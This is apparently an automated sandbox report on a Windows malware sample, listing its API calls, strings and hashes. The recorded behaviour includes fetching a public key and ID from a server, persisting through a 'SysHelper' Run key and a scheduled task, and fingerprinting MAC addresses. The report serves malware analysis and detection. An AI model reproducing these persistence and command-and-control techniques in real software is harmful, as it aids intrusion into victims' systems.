                                                                                                                              • Part of subcall function 0046C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0046C51B
                                                                                                                            • InternetOpenW.WININET ref: 0047E743
                                                                                                                            • _wcsstr.LIBCMT ref: 0047E7AE
                                                                                                                            • _memmove.LIBCMT ref: 0047E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0047E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 0047E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0047E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0047E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0047E9F6
                                                                                                                            • _strstr.LIBCMT ref: 0047EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0047EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EB7C
                                                                                                                            • _malloc.LIBCMT ref: 0047EB86
                                                                                                                            • _memset.LIBCMT ref: 0047EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0047EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EBB6
                                                                                                                            • _strstr.LIBCMT ref: 0047EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 0047EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 0047EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 0047ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0047ED4B
                                                                                                                            • _malloc.LIBCMT ref: 0047ED55
                                                                                                                            • _memset.LIBCMT ref: 0047ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0047ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 0047EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0047EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0047EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0047EE05
                                                                                                                            • _free.LIBCMT ref: 0047EE15
                                                                                                                            • _free.LIBCMT ref: 0047EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 0047EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: 550fea69011982aa702f9df1563227c58af4d62476bb8d6052ff34b4bb06d851
                                                                                                                            • Instruction ID: 6f11c0338a18957c166e7607d9db9ca5d7d4876b38839decbc162d0932cf860f
                                                                                                                            • Opcode Fuzzy Hash: 550fea69011982aa702f9df1563227c58af4d62476bb8d6052ff34b4bb06d851
                                                                                                                            • Instruction Fuzzy Hash: 0542F471508341ABDB20EF25CC49BDF7BE8BF59308F00495EF48997292DB789509CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046D26C
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0046D28F
                                                                                                                            • CoCreateInstance.OLE32(0053506C,00000000,00000001,00534FEC,?,?,00000000,000000FF), ref: 0046D2D5
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D2F0
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D309
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D322
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D33B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D397
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3A4
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3B1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3C2
                                                                                                                            • CoUninitialize.OLE32 ref: 0046D3D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                            • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                            • API String ID: 2496729271-1738591096
                                                                                                                            • Opcode ID: b0266b6b185dcf8f1dc3a9f9e868f0855bdcfb0f0f1d29deba6f4c7e06aafca2
                                                                                                                            • Instruction ID: 37aa648fc3d232e7746c5c1b5da7931a9f3c2bfbc162019e14d9173ef1701682
                                                                                                                            • Opcode Fuzzy Hash: b0266b6b185dcf8f1dc3a9f9e868f0855bdcfb0f0f1d29deba6f4c7e06aafca2
                                                                                                                            • Instruction Fuzzy Hash: 4B527F70E00219DFDB10DFA5C848FAEBBB5FF49304F148199E505AB251EB34AD46CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00471010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471026
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0047103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00471051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00471059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00471064
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0047107A
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00471099
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710AB
                                                                                                                            • _memset.LIBCMT ref: 004710CA
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004710DE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 004710F0
                                                                                                                            • _malloc.LIBCMT ref: 00471100
                                                                                                                            • _memset.LIBCMT ref: 0047110B
                                                                                                                            • _sprintf.LIBCMT ref: 0047112E
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0047113C
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 00471154
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0047115F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 2451520719-213608013
                                                                                                                            • Opcode ID: 337f0b06704204d818d9c72c8b40795410c290ec994badc7db54cf683149477d
                                                                                                                            • Instruction ID: ed9111a454036d3bae026f39e1e3ec94eefc035da51b3ddd21e59bd1e15e8b86
                                                                                                                            • Opcode Fuzzy Hash: 337f0b06704204d818d9c72c8b40795410c290ec994badc7db54cf683149477d
                                                                                                                            • Instruction Fuzzy Hash: 8751A171D40219ABDF20EBA4DC46FEFBBB8FF15704F100026FA05B6291D7795A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471ACA
                                                                                                                              • Part of subcall function 00471AB0: DispatchMessageW.USER32(?), ref: 00471AE0
                                                                                                                              • Part of subcall function 00471AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00471AEE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 0046F900
                                                                                                                            • _memmove.LIBCMT ref: 0046F9EA
                                                                                                                            • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0046FA51
                                                                                                                            • _memmove.LIBCMT ref: 0046FADA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 273148273-0
                                                                                                                            • Opcode ID: 6359b142e61149fdb8bd1f57c6ee7f01f497378491be98367a76445763f0bcf5
                                                                                                                            • Instruction ID: dac4e0bd32de0cfc4598dfd4c0ef62a9dbca906edc8011c5c7cb04596156aa80
                                                                                                                            • Opcode Fuzzy Hash: 6359b142e61149fdb8bd1f57c6ee7f01f497378491be98367a76445763f0bcf5
                                                                                                                            • Instruction Fuzzy Hash: 6652D170D00208DBCF10DFA8D985BDEB7F4BF05308F10856EE459A7251E779AA49CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1714 46e870-46e8d6 call 4756d0 CryptAcquireContextW 1717 46e8d8-46e8e4 call 490eca 1714->1717 1718 46e8e9-46e901 CryptCreateHash 1714->1718 1717->1718 1720 46e914-46e930 CryptHashData 1718->1720 1721 46e903-46e90f call 490eca 1718->1721 1723 46e932-46e93e call 490eca 1720->1723 1724 46e943-46e961 CryptGetHashParam 1720->1724 1721->1720 1723->1724 1726 46e974-46e9a6 call 480be4 call 48b420 CryptGetHashParam 1724->1726 1727 46e963-46e96f call 490eca 1724->1727 1733 46e9a8-46e9b4 call 490eca 1726->1733 1734 46e9b9-46e9bb 1726->1734 1727->1726 1733->1734 1736 46e9c0-46e9c3 1734->1736 1737 46e9c5-46e9df call 4804a6 1736->1737 1738 46ea10-46ea31 call 482110 CryptDestroyHash CryptReleaseContext 1736->1738 1745 46e9f2-46e9f5 1737->1745 1746 46e9e1-46e9f0 call 473ea0 1737->1746 1743 46ea33-46ea3b call 482587 1738->1743 1744 46ea3e-46ea50 1738->1744 1743->1744 1749 46e9f8-46e9fd 1745->1749 1746->1736 1749->1749 1750 46e9ff-46ea0e call 473ea0 1749->1750 1750->1736
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000), ref: 0046E8CE
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E8E4
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046E8F9
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E90F
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0046E928
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E93E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046E95D
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E96F
                                                                                                                            • _memset.LIBCMT ref: 0046E98E
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046E9A2
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046E9B4
                                                                                                                            • _sprintf.LIBCMT ref: 0046E9D3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1084002244-213608013
                                                                                                                            • Opcode ID: 5ab1ca20d477ce8f242366f124f0b2968f15a58a9a2f932d530490049c755648
                                                                                                                            • Instruction ID: 5e26b0c935ff1b54ae210d3a0da95a3588f9070baa3643effd86ce1a62566d7c
                                                                                                                            • Opcode Fuzzy Hash: 5ab1ca20d477ce8f242366f124f0b2968f15a58a9a2f932d530490049c755648
                                                                                                                            • Instruction Fuzzy Hash: 595172B1D40209ABDF11DFA1CC46FEFBBB8EF15704F10452AF501B6181E7796A058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1755 46eaa0-46eb09 call 4756d0 CryptAcquireContextW 1758 46eb1c-46eb34 CryptCreateHash 1755->1758 1759 46eb0b-46eb17 call 490eca 1755->1759 1761 46eb36-46eb42 call 490eca 1758->1761 1762 46eb47-46eb56 CryptHashData 1758->1762 1759->1758 1761->1762 1764 46eb58-46eb64 call 490eca 1762->1764 1765 46eb69-46eb87 CryptGetHashParam 1762->1765 1764->1765 1767 46eb9a-46ebcc call 480be4 call 48b420 CryptGetHashParam 1765->1767 1768 46eb89-46eb95 call 490eca 1765->1768 1774 46ebce-46ebda call 490eca 1767->1774 1775 46ebdf 1767->1775 1768->1767 1774->1775 1777 46ebe1-46ebe4 1775->1777 1778 46ebe6-46ec00 call 4804a6 1777->1778 1779 46ec38-46ec67 call 482110 CryptDestroyHash CryptReleaseContext 1777->1779 1784 46ec02-46ec11 call 473ea0 1778->1784 1785 46ec13-46ec19 1778->1785 1784->1777 1786 46ec20-46ec25 1785->1786 1786->1786 1788 46ec27-46ec36 call 473ea0 1786->1788 1788->1777
                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0055FCA4,00000000,00000000,00000000,?), ref: 0046EB01
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB17
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,004AF299,?,?,?,?,?,?,?,004AF299,?,00568238,?), ref: 00490F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0046EB2C
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB42
                                                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 0046EB4E
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB64
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0046EB83
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EB95
                                                                                                                            • _memset.LIBCMT ref: 0046EBB4
                                                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0046EBC8
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0046EBDA
                                                                                                                            • _sprintf.LIBCMT ref: 0046EBF4
                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0046EC44
                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046EC4F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: 0c0433b66f6048f8c2c71afa341c94106f981ccd626fe9dad670276b8a97b787
                                                                                                                            • Instruction ID: ea4b1a449e4bdfdf83846fbe935d5cf7bab8ad935e32adb0a5d9a84497b4640b
                                                                                                                            • Opcode Fuzzy Hash: 0c0433b66f6048f8c2c71afa341c94106f981ccd626fe9dad670276b8a97b787
                                                                                                                            • Instruction Fuzzy Hash: 59516171D40209AADF20DBA1CC46FEFBBB8EF15704F14052AF902B7281E77969058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1792 46e670-46e697 call 480c62 * 2 1797 46e6b4-46e6c2 GetAdaptersInfo 1792->1797 1798 46e699-46e6b3 call 481f2d call 480bed 1792->1798 1800 46e6c4-46e6d9 call 480bed call 480c62 1797->1800 1801 46e6db-46e6e8 GetAdaptersInfo 1797->1801 1800->1798 1800->1801 1802 46e744-46e754 call 480bed 1801->1802 1803 46e6ea-46e73c call 4804a6 call 481f2d * 2 1801->1803 1818 46e741 1803->1818 1818->1802
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0046E67F
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _malloc.LIBCMT ref: 0046E68B
                                                                                                                            • _wprintf.LIBCMT ref: 0046E69E
                                                                                                                            • _free.LIBCMT ref: 0046E6A4
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6B9
                                                                                                                            • _free.LIBCMT ref: 0046E6C5
                                                                                                                            • _malloc.LIBCMT ref: 0046E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 0046E720
                                                                                                                            • _wprintf.LIBCMT ref: 0046E732
                                                                                                                            • _wprintf.LIBCMT ref: 0046E73C
                                                                                                                            • _free.LIBCMT ref: 0046E745
                                                                                                                            Strings
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0046E71A
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0046E699
                                                                                                                            • Address: %s, mac: %s, xrefs: 0046E72D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: 1dd8d9867e866b96d28c185dae63fafa09baea85afa098e5432305184f33c286
                                                                                                                            • Instruction ID: 62ca1a70ffacf71c8f83b6ce1a21f458bd1db17afd21658e11326da53ba1915f
                                                                                                                            • Opcode Fuzzy Hash: 1dd8d9867e866b96d28c185dae63fafa09baea85afa098e5432305184f33c286
                                                                                                                            • Instruction Fuzzy Hash: BB113AB29005547BC2B173B64C06EFF3ADC8F46706F04056FFE98D5142E65C5A09A3BA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: dd362e5463ae82b735edcd23759e20c2ed518d569bcc91fe482a5118c27e5902
                                                                                                                            • Instruction ID: 59b0d89b13b52cafe7865db0817cae3585a529c84d81ba7369e7c46ed2be6a09
                                                                                                                            • Opcode Fuzzy Hash: dd362e5463ae82b735edcd23759e20c2ed518d569bcc91fe482a5118c27e5902
                                                                                                                            • Instruction Fuzzy Hash: 7BB19F70D00208DBDF20EFA4DD45BDEB7B5BF15308F10446AE40AAB251E779AA49CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                            • _memset.LIBCMT ref: 00471D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00471E99
